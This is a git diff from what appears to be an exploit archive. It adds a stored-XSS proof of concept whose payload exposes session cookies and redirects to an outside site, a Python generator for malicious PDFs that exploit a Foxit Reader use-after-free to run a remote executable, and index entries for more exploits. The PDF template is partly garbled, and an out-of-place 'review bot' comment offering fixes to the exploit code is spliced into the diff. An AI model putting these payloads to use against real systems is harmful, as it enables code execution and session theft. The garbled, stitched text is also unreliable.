+ + +[!] :: PoC (Burp Suite POST request): + +POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 350 +Origin: https://localhost +Connection: close +Referer: https://localhost/support-system/ticket/details/11.html +Cookie: [cookies_here] + +app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2 \ No newline at end of file diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py new file mode 100755 index 000000000..77ce33d1d --- /dev/null +++ b/exploits/windows/local/49116.py 
@@ -0,0 +1,273 @@ +# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution +# Date: August 29, 2020 +# Exploit Author: CrossWire +# Vendor Homepage: https://www.foxitsoftware.com/ +# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English +# Version: 9.0.1.1049 +# Tested on: Microsoft Windows Server 2016 10.0.14393 +# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958) + +#!/usr/bin/python3 + +''' +=========================================================================== +| PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) | +=========================================================================== +| Written by: Kevin Dorland (CrossWire) | +| Date: 08/29/2020 | +| | +| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite | +| | +| References: | +| https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) | +| https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) | +| | +=========================================================================== +''' + + +PDF_TEMPLATE = ''' +%PDF +1 0 obj +<> +2 0 obj +< + + //End Path to executable + + rop[0x17] = 0x00000000; // adios, amigo + } +} + +function trigger_uaf(){ + var that = this; + var a = this.addAnnot({type:"Text", page: 0, name:"uaf"}); + var arr = [1]; + Object.defineProperties(arr,{ + "0":{ + get: function () { + + that.getAnnot(0, "uaf").destroy(); + + reclaim(); + return 1; + } + } + }); + + a.point = arr; +} + +function main(){ + leak_heap_chunk(); + leak_vtable(); + control_memory(); + trigger_uaf(); +} + +if (app.platform == "WIN"){ + if (app.isFoxit == "Foxit Reader"){ + if (app.appFoxitVersion == "9.0.1.1049"){ + main(); + } + } +} + +)>> trailer <> +''' + +import sys + +#Enforces 2 hex char byte notation. 
"0" becomes "0x00" +def format_byte(b): + + if (len(b) > 2) and (b[0:2] == '0x'): + b = b[2:] + + if len(b) == 1: + b = '0' + b + + return '0x' + b + +def char2hex(c): + return format_byte(hex(ord(c))) + +#Converts file path into array of eleven 32-bit hex words +def path_to_machine_code(path,little_endian = True): + + print("[+] Encoding Path:",path) + + #ensure length + if len(path) > 44: + print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!") + exit(-1) + + #Copy path into 4 character (32 bit) words (max 11) + word_array = [] + for i in range(11): + + word = '' + + if len(path): + word += path[0:4] if len(path) >= 4 else path + path = path[len(word):] + + if len(word) < 4: + word += chr(0) * (4 - len(word)) + + word_array.append(word) + + #Convert chars to hex values and format to "0xAABBCCDD" notation + hex_array = [] + for word in word_array: + + #Reverse byte order to fit little endian standard + if(little_endian): word = word[::-1] + + #Write bytes to hex strings + hex_string = '0x' + for char in word: + hex_string += char2hex(char)[2:] #strip the 0x off the byte here + + hex_array.append(hex_string) + + return hex_array + +#writes encoded path to rop array to match template +def create_rop(hex_arr, start_index = '0c'): + + ord_array = [] + + index = int(start_index,16) + + for instruction in hex_arr: + + full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};" + + ord_array.append(full_instruction) + + index += 1 + + return ('\n'.join(ord_array)) + + + +if __name__ == '__main__': + + if len(sys.argv) != 3: + print(f"USAGE: {sys.argv[0]} ") + print("-- EXAMPLES --") + print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf") + + exit(-1) + + #Parse user args + EXE_PATH = sys.argv[1] + PDF_PATH = sys.argv[2] + + #Generate hex + raw_hex = path_to_machine_code(EXE_PATH) + + print("[+] Machine Code:") + for hex_word in raw_hex: + print(hex_word) + + ord_string = create_rop(raw_hex) + + print("[+] Instructions to 
add:")
+ print(ord_string)
+
+ print("[+] Generating pdf...")
+
+ print("\t- Filling template...")
+ evil_pdf = PDF_TEMPLATE.replace('',ord_string)
+
+ print("\t- Writing file...")
+ with open(PDF_PATH,'w') as fd:
+ fd.write(evil_pdf)
+
+ print("[+] Generated pdf:",PDF_PATH)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index efd412bf0..0d8798fae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6762,6 +6762,7 @@ id,file,description,date,author,type,platform,port
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
 49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
+49119,exploits/linux/dos/49119.py,"libupnp 1.6.18 - Stack-based buffer overflow (DoS)",2020-11-27,"Patrik Lantz",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
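Review bot: `path_to_machine_code` has no docstring, and its contract is narrower than the code admits: the length check reports `greater than 44 characters (bytes)` although `len(path)` counts characters, and `char2hex` pads `hex(ord(c))` to two digits but never truncates, so a non-ASCII character yields more than two hex digits and a malformed word with no error. Add a docstring stating that the path must be ASCII and at most 44 characters, and that the result is eleven little-endian 32-bit words padded with NUL bytes; an explicit `if not path.isascii():` check next to the length check would turn the silent case into the same abort. The parameter is also rebound inside the loop (`path = path[len(word):]`), which reads as mutation of the input; slicing by an index is clearer. The `#!/usr/bin/python3` line is on line 10 after the header comments and so is inert; name the interpreter in the header instead.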
@@ -11208,6 +11209,8 @@ id,file,description,date,author,type,platform,port
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
 49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
 49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
+49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
+49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43332,3 +43335,13 @@ id,file,description,date,author,type,platform,port
 49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
 49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
 49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,
+49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,
+49109,exploits/php/webapps/49109.txt,"WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting",2020-11-27,"Sun* Cyber Security Research Team",webapps,php,
+49110,exploits/hardware/webapps/49110.py,"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution",2020-11-27,"Emre SUREN",webapps,hardware,
+49112,exploits/php/webapps/49112.py,"Laravel Administrator 4 - Unrestricted File Upload (Authenticated)",2020-11-27,"Xavi Beltran",webapps,php,
+49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,
+49114,exploits/php/webapps/49114.txt,"Moodle 3.8 - Unrestricted File Upload",2020-11-27,"Sirwan Veisi",webapps,php,
+49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,
+49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
+49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
+49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,